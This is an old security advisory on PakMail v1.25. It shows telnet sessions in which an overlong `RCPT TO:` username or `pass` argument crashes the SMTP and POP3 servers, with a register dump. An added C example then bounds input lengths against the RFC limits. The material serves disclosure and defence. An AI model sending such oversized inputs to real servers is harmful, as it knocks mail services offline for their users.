pakmail.txt

06 Dec 1999 | Reported by slackee | Type: packetstorm | Source: packetstormsecurity.com

A vulnerability in PakMail v1.25 allows DoS attacks against its SMTP server via an overlong `RCPT TO:` username and against its POP3 server via an overlong `pass` argument.

`Vulnerable Program: PakMail v1.25 SMTP/POP3 Server  
Platform : Windows95, 98, NT  
Vendor : SilverSoft Corporation (www.pak.net)  
Impact : Remote/local users can DoS both SMTP & POP3 servers  
Found by : slackee ( [email protected] )  
Date : 5th December '99  
  
  
PakMail SMTP/POP3 Server  
________________________  
  
Pakmail V1.25, a state of the art POP3 and SMTP server, brings mail services common on   
Unix hosts and the Internet to Windows based micro-computers. This server is suited to   
corporate bodies and ISP's dealing in mail management. PakMail provides the following   
features.   
  
.User friendly maintenance of accounts   
.High performance yet low CPU usage   
.Mail Forwarding   
.Mailing Lists   
.Realtime status information   
.Debug logging   
.Powerful SMTP and POP3 builtin clients   
.Transparent SMTP and POP3 mail gateway.   
.Powerful yet easy management of sub-domains   
  
  
Vulnerability  
_____________  
  
Rewted Network Security Labs found a local/remote DoS attack in PakMail SMTP and POP3  
servers. The buffer overflow is caused by a long username specified for the `RCPT TO:`   
field in the SMTP server.  
  
Example:   
  
telnet localhost 25  
220 jedi PakMail Mail Server ready at Sun, 05 Dec 99  
mail from: test@localhost  
250 test@localhost Sender Ok  
rcpt to: $buffer@localhost  
  
where buffer is roughly 1390 characters. The server will shut down with an illegal operation  
and can no longer be used until restarted. The error is as follows:  
  
PAKMAIL caused an invalid page fault in  
module KERNEL32.DLL at 0137:bff9a5d0.  
Registers:  
EAX=c001743c CS=0137 EIP=bff9a5d0 EFLGS=00010212  
EBX=0159ffb8 SS=013f ESP=0149ff38 EBP=014a01d4  
ECX=00000000 DS=013f ESI=00000000 FS=4717  
EDX=bff7678c ES=013f EDI=bffb8e70 GS=0000  
Bytes at CS:EIP:  
53 8b 15 7c c2 fb bf 56 89 4d e4 57 89 4d dc 89   
Stack dump:  
  
Likewise, the POP3 server is also vulnerable to a similar attack, except the buffer overflow  
occurs when an extra long `pass` field is entered. The buffer for this is approx 1400 chars.  
PAKMAIL will crash with an almost identical error.  
  
Example:  
  
telnet localhost 110  
+OK PakMail on (jedi) at (Sun, 05 Dec 99)  
user test  
+OK  
pass $buffer  
  
The program will then terminate.  
  
  
Solution  
_____________  
  
Silversoft Corporation has been notified about this, so either wait for a patched release  
or switch smtp/pop3 servers.  
  
________________________________________________________  
r e w t e d n e t w o r k s e c u r i t y l a b s  
http://www.rewted.org  
`
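
The crashes described above come from copying an unbounded `RCPT TO:` username or `pass` argument into a fixed buffer. The following C code is an added example, not code from the advisory or from PakMail: it applies the length limits of RFC 5321 (SMTP) and RFC 1939 (POP3) before any copy is made. All function names are hypothetical, and `probe` builds constructed input of the sizes the advisory reports.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>
#define SMTP_LINE_MAX  512  /* RFC 5321 section 4.5.3.1: command line, CRLF included */
#define SMTP_LOCAL_MAX  64  /* RFC 5321 section 4.5.3.1: local-part (the username) */
#define POP3_ARG_MAX    40  /* RFC 1939 section 3: one command argument */

/* Case-insensitive match of an upper-case verb at the start of line. */
static int has_verb(const char *line, size_t len, const char *verb) {
    size_t n = strlen(verb), i = 0;
    while (i < n && i < len && toupper((unsigned char)line[i]) == verb[i]) i++;
    return i == n;
}

/* "RCPT TO:<user@domain>", CRLF stripped: copy user into out[SMTP_LOCAL_MAX+1]; reply code. */
int smtp_rcpt(const char *line, size_t len, char *out) {
    if (len + 2 > SMTP_LINE_MAX || !has_verb(line, len, "RCPT TO:")) return 500;
    const char *p = line + 8, *end = line + len;
    size_t local = 0;
    while (p < end && (*p == ' ' || *p == '<')) p++;  /* also takes "rcpt to: x" */
    while (p + local < end && p[local] != '@' && p[local] != '>') local++;
    if (local == 0 || local > SMTP_LOCAL_MAX) return 501;
    memcpy(out, p, local);  /* length already checked against out's size */
    out[local] = '\0';
    return 250;
}

/* "PASS secret", CRLF stripped: copy into out[POP3_ARG_MAX+1]; 1 = proceed, 0 = -ERR. */
int pop3_pass(const char *line, size_t len, char *out) {
    if (!has_verb(line, len, "PASS ") || len == 5 || len - 5 > POP3_ARG_MAX) return 0;
    memcpy(out, line + 5, len - 5);
    out[len - 5] = '\0';
    return 1;
}

/* Constructed test input: verb, n filler bytes, suffix. Returns check's verdict. */
int probe(int (*check)(const char *, size_t, char *), const char *verb, size_t n, const char *sfx) {
    char line[2048], out[SMTP_LOCAL_MAX + 1];
    size_t v = strlen(verb), s = strlen(sfx), len = v + n + s;
    if (len >= sizeof line) return -1;
    memcpy(line, verb, v); memset(line + v, 'A', n); memcpy(line + v + n, sfx, s);
    return check(line, len, out);
}

int main(void) {
    printf("RCPT, 1390-byte user: %d\n", probe(smtp_rcpt, "rcpt to: ", 1390, "@localhost"));
    printf("PASS, 1400-byte arg:  %d\n", probe(pop3_pass, "pass ", 1400, ""));
    return 0;
}
```

A server built this way answers the oversized `RCPT TO:` with a 500 reply and the oversized `pass` with `-ERR`, and keeps running.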

Vulners AI Score: 7.4 (High risk)